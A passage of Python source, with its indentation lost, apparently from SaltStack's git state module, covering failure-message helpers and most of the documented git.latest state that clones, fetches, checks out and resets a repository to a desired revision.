if comments:
# Shouldn't be making any changes if the repo was up to date, but
# report on them so we are alerted to potential problems with our
# logic.
ret['comment'] += '\n\nChanges made: ' + comments
return ret
def _neutral_test(ret, comment):
ret['result'] = None
ret['comment'] = comment
return ret
def _fail(ret, msg, comments=None):
ret['result'] = False
if comments:
msg += '\n\nChanges already made: '
msg += _format_comments(comments)
ret['comment'] = msg
return ret
def _failed_fetch(ret, exc, comments=None):
msg = (
'Fetch failed. Set \'force_fetch\' to True to force the fetch if the '
'failure was due to not being able to fast-forward. Output of the fetch '
'command follows:\n\n{0}'.format(_strip_exc(exc))
)
return _fail(ret, msg, comments)
def _failed_submodule_update(ret, exc, comments=None):
msg = 'Failed to update submodules: ' + _strip_exc(exc)
return _fail(ret, msg, comments)
def _not_fast_forward(ret, rev, pre, post, branch, local_branch,
default_branch, local_changes, comments):
branch_msg = ''
if branch is None:
if rev != 'HEAD':
if local_branch != rev:
branch_msg = (
' The desired rev ({0}) differs from the name of the '
'local branch ({1}), if the desired rev is a branch name '
'then a forced update could possibly be avoided by '
'setting the \'branch\' argument to \'{0}\' instead.'
.format(rev, local_branch)
)
else:
if default_branch is not None and local_branch != default_branch:
branch_msg = (
' The default remote branch ({0}) differs from the '
'local branch ({1}). This could be caused by changing the '
'default remote branch, or if the local branch was '
'manually changed. Rather than forcing an update, it '
'may be advisable to set the \'branch\' argument to '
'\'{0}\' instead. To ensure that this state follows the '
'\'{0}\' branch instead of the remote HEAD, set the '
'\'rev\' argument to \'{0}\'.'
.format(default_branch, local_branch)
)
pre = _short_sha(pre)
post = _short_sha(post)
return _fail(
ret,
'Repository would be updated {0}{1}, but {2}. Set \'force_reset\' to '
'True to force this update{3}.{4}'.format(
'from {0} to {1}'.format(pre, post)
if local_changes and pre != post
else 'to {0}'.format(post),
' (after checking out local branch \'{0}\')'.format(branch)
if _need_branch_change(branch, local_branch)
else '',
'this is not a fast-forward merge'
if not local_changes
else 'there are uncommitted changes',
' and discard these changes' if local_changes else '',
branch_msg,
),
comments
)
def latest(name,
rev='HEAD',
target=None,
branch=None,
user=None,
password=None,
update_head=True,
force_checkout=False,
force_clone=False,
force_fetch=False,
force_reset=False,
submodules=False,
bare=False,
mirror=False,
remote='origin',
fetch_tags=True,
depth=None,
identity=None,
https_user=None,
https_pass=None,
onlyif=False,
unless=False,
refspec_branch='*',
refspec_tag='*',
**kwargs):
'''
Make sure the repository is cloned to the given directory and is
up-to-date.
name
Address of the remote repository, as passed to ``git clone``
.. note::
From the `Git documentation`_, there are two URL formats
supported for SSH authentication. The below two examples are
equivalent:
.. code-block:: text
# ssh:// URL
ssh://user@server/project.git
# SCP-like syntax
user@server:project.git
A common mistake is to use an ``ssh://`` URL, but with a colon
after the domain instead of a slash. This is invalid syntax in
Git, and will therefore not work in Salt. When in doubt, confirm
that a ``git clone`` works for the URL before using it in Salt.
It has been reported by some users that SCP-like syntax is
incompatible with git repos hosted on `Atlassian Stash/BitBucket
Server`_. In these cases, it may be necessary to use ``ssh://``
URLs for SSH authentication.
.. _`Git documentation`: https://git-scm.com/book/en/v2/Git-on-the-Server-The-Protocols#The-SSH-Protocol
.. _`Atlassian Stash/BitBucket Server`: https://www.atlassian.com/software/bitbucket/server
rev : HEAD
The remote branch, tag, or revision ID to checkout after clone / before
update. If specified, then Salt will also ensure that the tracking
branch is set to ``<remote>/<rev>``, unless ``rev`` refers to a tag or
SHA1, in which case Salt will ensure that the tracking branch is unset.
If ``rev`` is not specified, it will be assumed to be ``HEAD``, and
Salt will not manage the tracking branch at all.
.. versionchanged:: 2015.8.0
If not specified, ``rev`` now defaults to the remote repository's
HEAD.
target
Name of the target directory where repository is about to be cloned
branch
Name of the local branch into which to checkout the specified rev. If
not specified, then Salt will not care what branch is being used
locally and will just use whatever branch is currently there.
.. versionadded:: 2015.8.0
.. note::
If this argument is not specified, this means that Salt will not
change the local branch if the repository is reset to another
branch/tag/SHA1. For example, assume that the following state was
run initially:
.. code-block:: yaml
foo_app:
git.latest:
- name: https://mydomain.tld/apps/foo.git
- target: /var/www/foo
- user: www
This would have cloned the HEAD of that repo (since a ``rev``
wasn't specified), and because ``branch`` is not specified, the
branch in the local clone at ``/var/www/foo`` would be whatever the
default branch is on the remote repository (usually ``master``, but
not always). Now, assume that it becomes necessary to switch this
checkout to the ``dev`` branch. This would require ``rev`` to be
set, and probably would also require ``force_reset`` to be enabled:
.. code-block:: yaml
foo_app:
git.latest:
- name: https://mydomain.tld/apps/foo.git
- target: /var/www/foo
- user: www
- rev: dev
- force_reset: True
The result of this state would be to perform a hard-reset to
``origin/dev``. Since ``branch`` was not specified though, while
``/var/www/foo`` would reflect the contents of the remote repo's
``dev`` branch, the local branch would still remain whatever it was
when it was cloned. To make the local branch match the remote one,
set ``branch`` as well, like so:
.. code-block:: yaml
foo_app:
git.latest:
- name: https://mydomain.tld/apps/foo.git
- target: /var/www/foo
- user: www
- rev: dev
- branch: dev
- force_reset: True
This may seem redundant, but Salt tries to support a wide variety
of use cases, and doing it this way allows for the use case where
the local branch doesn't need to be strictly managed.
user
Local system user under which to run git commands. By default, commands
are run by the user under which the minion is running.
.. note::
This is not to be confused with the username for http(s)/SSH
authentication.
.. versionadded:: 0.17.0
password
Windows only. Required when specifying ``user``. This parameter will be
ignored on non-Windows platforms.
.. versionadded:: 2016.3.4
update_head : True
If set to ``False``, then the remote repository will be fetched (if
necessary) to ensure that the commit to which ``rev`` points exists in
the local checkout, but no changes will be made to the local HEAD.
.. versionadded:: 2015.8.3
force_checkout : False
When checking out the local branch, the state will fail if there are
unwritten changes. Set this argument to ``True`` to discard unwritten
changes when checking out.
force_clone : False
If the ``target`` directory exists and is not a git repository, then
this state will fail. Set this argument to ``True`` to remove the
contents of the target directory and clone the repo into it.
force_fetch : False
If a fetch needs to be performed, non-fast-forward fetches will cause
this state to fail. Set this argument to ``True`` to force the fetch
even if it is a non-fast-forward update.
.. versionadded:: 2015.8.0
force_reset : False
If the update is not a fast-forward, this state will fail. Set this
argument to ``True`` to force a hard-reset to the remote revision in
these cases.
submodules : False
Update submodules on clone or branch change
bare : False
Set to ``True`` if the repository is to be a bare clone of the remote
repository.
.. note:
Setting this option to ``True`` is incompatible with the ``rev``
argument.
mirror
Set to ``True`` if the repository is to be a mirror of the remote
repository. This implies that ``bare`` set to ``True``, and thus is
incompatible with ``rev``.
remote : origin
Git remote to use. If this state needs to clone the repo, it will clone
it using this value as the initial remote name. If the repository
already exists, and a remote by this name is not present, one will be
added.
fetch_tags : True
If ``True``, then when a fetch is performed all tags will be fetched,
even those which are not reachable by any branch on the remote.
depth
Defines depth in history when git a clone is needed in order to ensure
latest. E.g. ``depth: 1`` is useful when deploying from a repository
with a long history. Use rev to specify branch. This is not compatible
with tags or revision IDs.
identity
Path to a private key to use for ssh URLs. This can be either a single
string, or a list of strings. For example:
.. code-block:: yaml
# Single key
git@github.com:user/repo.git:
git.latest:
- user: deployer
- identity: /home/deployer/.ssh/id_rsa
# Two keys
git@github.com:user/repo.git:
git.latest:
- user: deployer
- identity:
- /home/deployer/.ssh/id_rsa
- /home/deployer/.ssh/id_rsa_alternate
If multiple keys are specified, they will be tried one-by-one in order
for each git command which needs to authenticate.
.. warning::
Unless Salt is invoked from the minion using ``salt-call``, the
key(s) must be passphraseless. For greater security with
passphraseless private keys, see the `sshd(8)`_ manpage for
information on securing the keypair from the remote side in the
``authorized_keys`` file.
.. _`sshd(8)`: http://www.man7.org/linux/man-pages/man8/sshd.8.html#AUTHORIZED_KEYS_FILE%20FORMAT
.. versionchanged:: 2015.8.7
Salt will no longer attempt to use passphrase-protected keys unless
invoked from the minion using ``salt-call``, to prevent blocking
waiting for user input.
.. versionchanged:: 2016.3.0
Key can now be specified as a SaltStack fileserver URL (e.g.
``salt://path/to/identity_file``).
https_user
HTTP Basic Auth username for HTTPS (only) clones
.. versionadded:: 2015.5.0
https_pass
HTTP Basic Auth password for HTTPS (only) clones
.. versionadded:: 2015.5.0
onlyif
A command to run as a check, run the named command only if the command
passed to the ``onlyif`` option returns true
unless
A command to run as a check, only run the named command if the command
passed to the ``unless`` option returns false
refspec_branch : *
A glob expression defining which branches to retrieve when fetching.
See `git-fetch(1)`_ for more information on how refspecs work.
.. versionadded:: Nitrogen
refspec_tag : *
A glob expression defining which tags to retrieve when fetching. See
`git-fetch(1)`_ for more information on how refspecs work.
.. versionadded:: Nitrogen
.. _`git-fetch(1)`: http://git-scm.com/docs/git-fetch
.. note::
Clashing ID declarations can be avoided when including different
branches from the same git repository in the same SLS file by using the
``name`` argument. The example below checks out the ``gh-pages`` and
``gh-pages-prod`` branches from the same repository into separate
directories. The example also sets up the ``ssh_known_hosts`` ssh key
required to perform the git checkout.
Also, it has been reported that the SCP-like syntax for
.. code-block:: yaml
gitlab.example.com:
ssh_known_hosts:
- present
- user: root
- enc: ecdsa
- fingerprint: 4e:94:b0:54:c1:5b:29:a2:70:0e:e1:a3:51:ee:ee:e3
git-website-staging:
git.latest:
- name: git@gitlab.example.com:user/website.git
- rev: gh-pages
- target: /usr/share/nginx/staging
- identity: /root/.ssh/website_id_rsa
- require:
- pkg: git
- ssh_known_hosts: gitlab.example.com
git-website-staging:
git.latest:
- name: git@gitlab.example.com:user/website.git
- rev: gh-pages
- target: /usr/share/nginx/staging
- identity: salt://website/id_rsa
- require:
- pkg: git
- ssh_known_hosts: gitlab.example.com
git-website-prod:
git.latest:
- name: git@gitlab.example.com:user/website.git
- rev: gh-pages-prod
- target: /usr/share/nginx/prod
- identity: /root/.ssh/website_id_rsa
- require:
- pkg: git
- ssh_known_hosts: gitlab.example.com
'''
ret = {'name': name, 'result': True, 'comment': '', 'changes': {}}
kwargs = salt.utils.clean_kwargs(**kwargs)
if kwargs:
return _fail(
ret,
salt.utils.invalid_kwargs(kwargs, raise_exc=False)
)
if not remote:
return _fail(ret, '\'remote\' argument is required')
if not target:
return _fail(ret, '\'target\' argument is required')
if not rev:
return _fail(
ret,
'\'{0}\' is not a valid value for the \'rev\' argument'.format(rev)
)
# Ensure that certain arguments are strings to ensure that comparisons work
if not isinstance(rev, six.string_types):
rev = str(rev)
if target is not None:
if not isinstance(target, six.string_types):
target = str(target)
if not os.path.isabs(target):
return _fail(
ret,
'target \'{0}\' is not an absolute path'.format(target)
)
if branch is not None and not isinstance(branch, six.string_types):
branch = str(branch)
if user is not None and not isinstance(user, six.string_types):
user = str(user)
if password is not None and not isinstance(password, six.string_types):
password = str(password)
if remote is not None and not isinstance(remote, six.string_types):
remote = str(remote)
if identity is not None:
if isinstance(identity, six.string_types):
identity = [identity]
elif not isinstance(identity, list):
return _fail(ret, 'identity must be either a list or a string')
for ident_path in identity:
if 'salt://' in ident_path:
try:
ident_path = __salt__['cp.cache_file'](ident_path, __env__)
except IOError as exc:
log.error(
'Failed to cache {0}: {1}'.format(ident_path, exc)
)
return _fail(
ret,
'identity \'{0}\' does not exist.'.format(
ident_path
)
)
if not os.path.isabs(ident_path):
return _fail(
ret,
'identity \'{0}\' is not an absolute path'.format(
ident_path
)
)
if https_user is not None and not isinstance(https_user, six.string_types):
https_user = str(https_user)
if https_pass is not None and not isinstance(https_pass, six.string_types):
https_pass = str(https_pass)
if os.path.isfile(target):
return _fail(
ret,
'Target \'{0}\' exists and is a regular file, cannot proceed'
.format(target)
)
try:
desired_fetch_url = salt.utils.url.add_http_basic_auth(
name,
https_user,
https_pass,
https_only=True
)
except ValueError as exc:
return _fail(ret, exc.__str__())
redacted_fetch_url = \
salt.utils.url.redact_http_basic_auth(desired_fetch_url)
if mirror:
bare = True
# Check to make sure rev and mirror/bare are not both in use
if rev != 'HEAD' and bare:
return _fail(ret, ('\'rev\' is not compatible with the \'mirror\' and '
'\'bare\' arguments'))
run_check_cmd_kwargs = {'runas': user, 'password': password}
if 'shell' in __grains__:
run_check_cmd_kwargs['shell'] = __grains__['shell']
# check if git.latest should be applied
cret = mod_run_check(
run_check_cmd_kwargs, onlyif, unless
)
if isinstance(cret, dict):
ret.update(cret)
return ret
refspecs = [
'refs/heads/{0}:refs/remotes/{1}/{0}'.format(refspec_branch, remote),
'+refs/tags/{0}:refs/tags/{0}'.format(refspec_tag)
] if fetch_tags else []
log.info('Checking remote revision for {0}'.format(name))
try:
all_remote_refs = __salt__['git.remote_refs'](
name,
heads=False,
tags=False,
user=user,
password=password,
identity=identity,
https_user=https_user,
https_pass=https_pass,
ignore_retcode=False,
saltenv=__env__)
except CommandExecutionError as exc:
return _fail(
ret,
'Failed to check remote refs: {0}'.format(_strip_exc(exc))
)
if 'HEAD' in all_remote_refs:
head_rev = all_remote_refs['HEAD']
for refname, refsha in six.iteritems(all_remote_refs):
if refname.startswith('refs/heads/'):
if refsha == head_rev:
default_branch = refname.partition('refs/heads/')[-1]
break
else:
default_branch = None
else:
head_ref = None
default_branch = None
desired_upstream = False
if bare:
remote_rev = None
remote_rev_type = None
else:
if rev == 'HEAD':
if head_rev is not None:
remote_rev = head_rev
# Just go with whatever the upstream currently is
desired_upstream = None
remote_rev_type = 'sha1'
else:
# Empty remote repo
remote_rev = None
remote_rev_type = None
elif 'refs/heads/' + rev in all_remote_refs:
remote_rev = all_remote_refs['refs/heads/' + rev]
desired_upstream = '/'.join((remote, rev))
remote_rev_type = 'branch'
elif 'refs/tags/' + rev + '^{}' in all_remote_refs:
# Annotated tag
remote_rev = all_remote_refs['refs/tags/' + rev + '^{}']
remote_rev_type = 'tag'
elif 'refs/tags/' + rev in all_remote_refs:
# Non-annotated tag
remote_rev = all_remote_refs['refs/tags/' + rev]
remote_rev_type = 'tag'
else:
if len(rev) <= 40 \
and all(x in string.hexdigits for x in rev):
# git ls-remote did not find the rev, and because it's a
# hex string <= 40 chars we're going to assume that the
# desired rev is a SHA1
rev = rev.lower()
remote_rev = rev
remote_rev_type = 'sha1'
else:
remote_rev = None
remote_rev_type = None
# For the comment field of the state return dict, the remote location
# (and short-sha1, if rev is not a sha1) is referenced several times,
# determine it once here and reuse the value below.
if remote_rev_type == 'sha1':
if rev == 'HEAD':
remote_loc = 'remote HEAD (' + remote_rev[:7] + ')'
else:
remote_loc = remote_rev[:7]
elif remote_rev is not None:
remote_loc = '{0} ({1})'.format(
desired_upstream if remote_rev_type == 'branch' else rev,
remote_rev[:7]
)
else:
# Shouldn't happen but log a warning here for future
# troubleshooting purposes in the event we find a corner case.
log.warning(
'Unable to determine remote_loc. rev is %s, remote_rev is '
'%s, remove_rev_type is %s, desired_upstream is %s, and bare '
'is%s set',
rev,
remote_rev,
remote_rev_type,
desired_upstream,
' not' if not bare else ''
)
remote_loc = None
if remote_rev is None and not bare:
if rev != 'HEAD':
# A specific rev is desired, but that rev doesn't exist on the
# remote repo.
return _fail(
ret,
'No revision matching \'{0}\' exists in the remote '
'repository'.format(rev)
)
git_ver = _LooseVersion(__salt__['git.version'](versioninfo=False))
check = 'refs' if bare else '.git'
gitdir = os.path.join(target, check)
comments = []
if os.path.isdir(gitdir) or __salt__['git.is_worktree'](target,
user=user,
password=password):
# Target directory is a git repository or git worktree
try:
all_local_branches = __salt__['git.list_branches'](
target, user=user, password=password)
all_local_tags = __salt__['git.list_tags'](target,
user=user,
password=password)
local_rev, local_branch = \
_get_local_rev_and_branch(target, user, password)
if not bare and remote_rev is None and local_rev is not None:
return _fail(
ret,
'Remote repository is empty, cannot update from a '
'non-empty to an empty repository'
)
# Base rev and branch are the ones from which any reset or merge
# will take place. If the branch is not being specified, the base
# will be the "local" rev and branch, i.e. those we began with
# before this state was run. If a branch is being specified and it
# both exists and is not the one with which we started, then we'll
# be checking that branch out first, and it instead becomes our
# base. The base branch and rev will be used below in comparisons
# to determine what changes to make.
base_rev = local_rev
base_branch = local_branch
if _need_branch_change(branch, local_branch):
if branch not in all_local_branches:
# We're checking out a new branch, so the base_rev and
# remote_rev will be identical.
base_rev = remote_rev
else:
base_branch = branch
# Desired branch exists locally and is not the current
# branch. We'll be performing a checkout to that branch
# eventually, but before we do that we need to find the
# current SHA1.
try:
base_rev = __salt__['git.rev_parse'](
target,
branch + '^{commit}',
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError as exc:
return _fail(
ret,
'Unable to get position of local branch \'{0}\': '
'{1}'.format(branch, _strip_exc(exc)),
comments
)
remotes = __salt__['git.remotes'](target,
user=user,
password=password,
redact_auth=False)
revs_match = _revs_equal(local_rev, remote_rev, remote_rev_type)
try:
local_changes = bool(
__salt__['git.diff'](target,
'HEAD',
user=user,
password=password)
)
except CommandExecutionError:
# No need to capture the error and log it, the _git_run()
# helper in the git execution module will have already logged
# the output from the command.
log.warning(
'git.latest: Unable to determine if %s has local changes',
target
)
local_changes = False
if local_changes and revs_match:
if force_reset:
msg = (
'{0} is up-to-date, but with local changes. Since '
'\'force_reset\' is enabled, these local changes '
'would be reset.'.format(target)
)
if __opts__['test']:
ret['changes']['forced update'] = True
if comments:
msg += _format_comments(comments)
return _neutral_test(ret, msg)
log.debug(msg.replace('would', 'will'))
else:
log.debug(
'%s up-to-date, but with local changes. Since '
'\'force_reset\' is disabled, no changes will be '
'made.', target
)
return _uptodate(ret,
target,
_format_comments(comments),
local_changes)
if remote_rev_type == 'sha1' \
and base_rev is not None \
and base_rev.startswith(remote_rev):
# Either we're already checked out to the branch we need and it
# is up-to-date, or the branch to which we need to switch is
# on the same SHA1 as the desired remote revision. Either way,
# we know we have the remote rev present already and no fetch
# will be needed.
has_remote_rev = True
else:
has_remote_rev = False
if remote_rev is not None:
try:
__salt__['git.rev_parse'](
target,
remote_rev + '^{commit}',
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
# Local checkout doesn't have the remote_rev
pass
else:
# The object might exist enough to get a rev-parse to
# work, while the local ref could have been
# deleted/changed/force updated. Do some further sanity
# checks to determine if we really do have the
# remote_rev.
if remote_rev_type == 'branch':
if remote in remotes:
try:
# Do a rev-parse on <remote>/<rev> to get
# the local SHA1 for it, so we can compare
# it to the remote_rev SHA1.
local_copy = __salt__['git.rev_parse'](
target,
desired_upstream,
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
pass
else:
# If the SHA1s don't match, then the remote
# branch was force-updated, and we need to
# fetch to update our local copy the ref
# for the remote branch. If they do match,
# then we have the remote_rev and don't
# need to fetch.
if local_copy == remote_rev:
has_remote_rev = True
elif remote_rev_type == 'tag':
if rev in all_local_tags:
try:
local_tag_sha1 = __salt__['git.rev_parse'](
target,
rev + '^{commit}',
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
# Shouldn't happen if the tag exists
# locally but account for this just in
# case.
local_tag_sha1 = None
if local_tag_sha1 == remote_rev:
has_remote_rev = True
else:
if not force_reset:
# SHA1 of tag on remote repo is
# different than local tag. Unless
# we're doing a hard reset then we
# don't need to proceed as we know that
# the fetch will update the tag and the
# only way to make the state succeed is
# to reset the branch to point at the
# tag's new location.
return _fail(
ret,
'\'{0}\' is a tag, but the remote '
'SHA1 for this tag ({1}) doesn\'t '
'match the local SHA1 ({2}). Set '
'\'force_reset\' to True to force '
'this update.'.format(
rev,
_short_sha(remote_rev),
_short_sha(local_tag_sha1)
)
)
elif remote_rev_type == 'sha1':
has_remote_rev = True
# If fast_forward is not boolean, then we don't know if this will
# be a fast forward or not, because a fetch is required.
fast_forward = None if not local_changes else False
if has_remote_rev:
if (not revs_match and not update_head) \
and (branch is None or branch == local_branch):
ret['comment'] = remote_loc.capitalize() \
if rev == 'HEAD' \
else remote_loc
ret['comment'] += (
' is already present and local HEAD ({0}) does not '
'match, but update_head=False. HEAD has not been '
'updated locally.'.format(local_rev[:7])
)
return ret
# No need to check if this is a fast_forward if we already know
# that it won't be (due to local changes).
if fast_forward is not False:
if base_rev is None:
# If we're here, the remote_rev exists in the local
# checkout but there is still no HEAD locally. A
# possible reason for this is that an empty repository
# existed there and a remote was added and fetched, but
# the repository was not fast-forwarded. Regardless,
# going from no HEAD to a locally-present rev is
# considered a fast-forward update, unless there are
# local changes.
fast_forward = not bool(local_changes)
else:
fast_forward = __salt__['git.merge_base'](
target,
refs=[base_rev, remote_rev],
is_ancestor=True,
user=user,
password=password,
ignore_retcode=True)
if fast_forward is False:
if not force_reset:
return _not_fast_forward(
ret,
rev,
base_rev,
remote_rev,
branch,
local_branch,
default_branch,
local_changes,
comments)
merge_action = 'hard-reset'
elif fast_forward is True:
merge_action = 'fast-forwarded'
else:
merge_action = 'updated'
if base_branch is None:
# No local branch, no upstream tracking branch
upstream = None
else:
try:
upstream = __salt__['git.rev_parse'](
target,
base_branch + '@{upstream}',
opts=['--abbrev-ref'],
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
# There is a local branch but the rev-parse command
# failed, so that means there is no upstream tracking
# branch. This could be because it is just not set, or
# because the branch was checked out to a SHA1 or tag
# instead of a branch. Set upstream to False to make a
# distinction between the case above where there is no
# local_branch (when the local checkout is an empty
# repository).
upstream = False
if remote in remotes:
fetch_url = remotes[remote]['fetch']
else:
log.debug(
'Remote \'{0}\' not found in git checkout at {1}'
.format(remote, target)
)
fetch_url = None
if remote_rev is not None and desired_fetch_url != fetch_url:
if __opts__['test']:
actions = [
'Remote \'{0}\' would be changed from {1} to {2}'
.format(
remote,
salt.utils.url.redact_http_basic_auth(fetch_url),
redacted_fetch_url
)
]
if not has_remote_rev:
actions.append('Remote would be fetched')
if not revs_match:
if update_head:
ret['changes']['revision'] = {
'old': local_rev, 'new': remote_rev
}
if fast_forward is False:
ret['changes']['forced update'] = True
actions.append(
'Repository would be {0} to {1}'.format(
merge_action,
_short_sha(remote_rev)
)
)
if ret['changes']:
return _neutral_test(ret, _format_comments(actions))
else:
if not revs_match and not update_head:
# Repo content would not be modified but the remote
# URL would be modified, so we can't just say that
# the repo is up-to-date, we need to inform the
# user of the actions taken.
ret['comment'] = _format_comments(actions)
return ret
return _uptodate(ret,
target,
_format_comments(actions))
# The fetch_url for the desired remote does not match the
# specified URL (or the remote does not exist), so set the
# remote URL.
__salt__['git.remote_set'](target,
url=name,
remote=remote,
user=user,
password=password,
https_user=https_user,
https_pass=https_pass)
comments.append(
'Remote \'{0}\' changed from {1} to {2}'.format(
remote,
salt.utils.url.redact_http_basic_auth(fetch_url),
redacted_fetch_url
)
)
if remote_rev is not None:
if __opts__['test']:
actions = []
if not has_remote_rev:
actions.append(
'Remote \'{0}\' would be fetched'.format(remote)
)
if (not revs_match) \
and (update_head or (branch is not None
and branch != local_branch)):
ret['changes']['revision'] = {
'old': local_rev, 'new': remote_rev
}
if _need_branch_change(branch, local_branch):
if branch not in all_local_branches:
actions.append(
'New branch \'{0}\' would be checked '
'out, with {1} as a starting '
'point'.format(branch, remote_loc)
)
if desired_upstream:
actions.append(
'Tracking branch would be set to {0}'
.format(desired_upstream)
)
else:
actions.append(
'Branch \'{0}\' would be checked out '
'and {1} to {2}'.format(
branch,
merge_action,
_short_sha(remote_rev)
)
)
else:
if not revs_match:
if update_head:
if fast_forward is True:
actions.append(
'Repository would be fast-forwarded from '
'{0} to {1}'.format(
_short_sha(local_rev),
_short_sha(remote_rev)
)
)
else:
actions.append(
'Repository would be {0} from {1} to {2}'
.format(
'hard-reset'
if force_reset and has_remote_rev
else 'updated',
_short_sha(local_rev),
_short_sha(remote_rev)
)
)
else:
actions.append(
'Local HEAD ({0}) does not match {1} but '
'update_head=False, HEAD would not be '
'updated locally'.format(
local_rev[:7],
remote_loc
)
)
# Check if upstream needs changing
if not upstream and desired_upstream:
actions.append(
'Tracking branch would be set to {0}'.format(
desired_upstream
)
)
elif upstream and desired_upstream is False:
actions.append(
'Tracking branch would be unset'
)
elif desired_upstream and upstream != desired_upstream:
actions.append(
'Tracking branch would be '
'updated to {0}'.format(desired_upstream)
)
if ret['changes']:
return _neutral_test(ret, _format_comments(actions))
else:
formatted_actions = _format_comments(actions)
if not revs_match \
and not update_head \
and formatted_actions:
ret['comment'] = formatted_actions
return ret
return _uptodate(ret,
target,
_format_comments(actions))
if not upstream and desired_upstream:
upstream_action = (
'Tracking branch was set to {0}'.format(
desired_upstream
)
)
branch_opts = _get_branch_opts(
branch,
local_branch,
all_local_branches,
desired_upstream,
git_ver)
elif upstream and desired_upstream is False:
# If the remote_rev is a tag or SHA1, and there is an
# upstream tracking branch, we will unset it. However, we
# can only do this if the git version is 1.8.0 or newer, as
# the --unset-upstream option was not added until that
# version.
if git_ver >= _LooseVersion('1.8.0'):
upstream_action = 'Tracking branch was unset'
branch_opts = ['--unset-upstream']
else:
branch_opts = None
elif desired_upstream and upstream != desired_upstream:
upstream_action = (
'Tracking branch was updated to {0}'.format(
desired_upstream
)
)
branch_opts = _get_branch_opts(
branch,
local_branch,
all_local_branches,
desired_upstream,
git_ver)
else:
branch_opts = None
if branch_opts is not None and local_branch is None:
return _fail(
ret,
'Cannot set/unset upstream tracking branch, local '
'HEAD refers to nonexistent branch. This may have '
'been caused by cloning a remote repository for which '
'the default branch was renamed or deleted. If you '
'are unable to fix the remote repository, you can '
'work around this by setting the \'branch\' argument '
'(which will ensure that the named branch is created '
'if it does not already exist).',
comments
)
if not has_remote_rev:
try:
fetch_changes = __salt__['git.fetch'](
target,
remote=remote,
force=force_fetch,
refspecs=refspecs,
user=user,
password=password,
identity=identity,
saltenv=__env__)
except CommandExecutionError as exc:
return _failed_fetch(ret, exc, comments)
else:
if fetch_changes:
comments.append(
'{0} was fetched, resulting in updated '
'refs'.format(name)
)
try:
__salt__['git.rev_parse'](
target,
remote_rev + '^{commit}',
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError as exc:
return _fail(
ret,
'Fetch did not successfully retrieve rev \'{0}\' '
'from {1}: {2}'.format(rev, name, exc)
)
if (not revs_match and not update_head) \
and (branch is None or branch == local_branch):
# Rev now exists locally (was fetched), and since we're
# not updating HEAD we'll just exit here.
ret['comment'] = remote_loc.capitalize() \
if rev == 'HEAD' \
else remote_loc
ret['comment'] += (
' is already present and local HEAD ({0}) does not '
'match, but update_head=False. HEAD has not been '
'updated locally.'.format(local_rev[:7])
)
return ret
# Now that we've fetched, check again whether or not
# the update is a fast-forward.
if base_rev is None:
fast_forward = True
else:
fast_forward = __salt__['git.merge_base'](
target,
refs=[base_rev, remote_rev],
is_ancestor=True,
user=user,
password=password)
if fast_forward is False and not force_reset:
return _not_fast_forward(
ret,
rev,
base_rev,
remote_rev,
branch,
local_branch,
default_branch,
local_changes,
comments)
if _need_branch_change(branch, local_branch):
if local_changes and not force_checkout:
return _fail(
ret,
'Local branch \'{0}\' has uncommitted '
'changes. Set \'force_checkout\' to True to '
'discard them and proceed.'.format(local_branch)
)
# TODO: Maybe re-retrieve all_local_branches to handle
# the corner case where the destination branch was
# added to the local checkout during a fetch that takes
# a long time to complete.
if branch not in all_local_branches:
if rev == 'HEAD':
checkout_rev = remote_rev
else:
checkout_rev = desired_upstream \
if desired_upstream \
else rev
checkout_opts = ['-b', branch]
else:
checkout_rev = branch
checkout_opts = []
__salt__['git.checkout'](target,
checkout_rev,
force=force_checkout,
opts=checkout_opts,
user=user,
password=password)
if '-b' in checkout_opts:
comments.append(
'New branch \'{0}\' was checked out, with {1} '
'as a starting point'.format(
branch,
remote_loc
)
)
else:
comments.append(
'\'{0}\' was checked out'.format(checkout_rev)
)
if local_changes:
comments.append('Local changes were discarded')
if fast_forward is False:
__salt__['git.reset'](
target,
opts=['--hard', remote_rev],
user=user,
password=password,
)
ret['changes']['forced update'] = True
comments.append(
'Repository was hard-reset to {0}'.format(remote_loc)
)
if branch_opts is not None:
__salt__['git.branch'](
target,
opts=branch_opts,
user=user,
password=password)
comments.append(upstream_action)
# Fast-forward to the desired revision
if fast_forward is True \
and not _revs_equal(base_rev,
remote_rev,
remote_rev_type):
if desired_upstream or rev == 'HEAD':
# Check first to see if we are on a branch before
# trying to merge changes. (The call to
# git.symbolic_ref will only return output if HEAD
# points to a branch.)
if __salt__['git.symbolic_ref'](target,
'HEAD',
opts=['--quiet'],
user=user,
password=password,
ignore_retcode=True):
merge_rev = remote_rev if rev == 'HEAD' \
else desired_upstream
if git_ver >= _LooseVersion('1.8.1.6'):
# --ff-only added in version 1.8.1.6. It's not
# 100% necessary, but if we can use it, we'll
# ensure that the merge doesn't go through if
# not a fast-forward. Granted, the logic that
# gets us to this point shouldn't allow us to
# attempt this merge if it's not a
# fast-forward, but it's an extra layer of
# protection.
merge_opts = ['--ff-only']
else:
merge_opts = []
__salt__['git.merge'](
target,
rev=merge_rev,
opts=merge_opts,
user=user,
password=password)
comments.append(
'Repository was fast-forwarded to {0}'
.format(remote_loc)
)
else:
return _fail(
ret,
'Unable to fast-forward, HEAD is detached',
comments
)
else:
# Update is a fast forward, but we cannot merge to that
# commit so we'll reset to it.
__salt__['git.reset'](
target,
opts=['--hard',
remote_rev if rev == 'HEAD' else rev],
user=user,
password=password)
comments.append(
'Repository was reset to {0} (fast-forward)'
.format(rev)
)
# TODO: Figure out how to add submodule update info to
# test=True return data, and changes dict.
if submodules:
try:
__salt__['git.submodule'](
target,
'update',
opts=['--init', '--recursive'],
user=user,
password=password,
identity=identity,
saltenv=__env__)
except CommandExecutionError as exc:
return _failed_submodule_update(ret, exc, comments)
elif bare:
if __opts__['test']:
msg = (
'Bare repository at {0} would be fetched'
.format(target)
)
if ret['changes']:
return _neutral_test(ret, msg)
else:
return _uptodate(ret, target, msg)
try:
fetch_changes = __salt__['git.fetch'](
target,
remote=remote,
force=force_fetch,
refspecs=refspecs,
user=user,
password=password,
identity=identity,
saltenv=__env__)
except CommandExecutionError as exc:
return _failed_fetch(ret, exc, comments)
else:
comments.append(
'Bare repository at {0} was fetched{1}'.format(
target,
', resulting in updated refs'
if fetch_changes
else ''
)
)
try:
new_rev = __salt__['git.revision'](
cwd=target,
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
new_rev = None
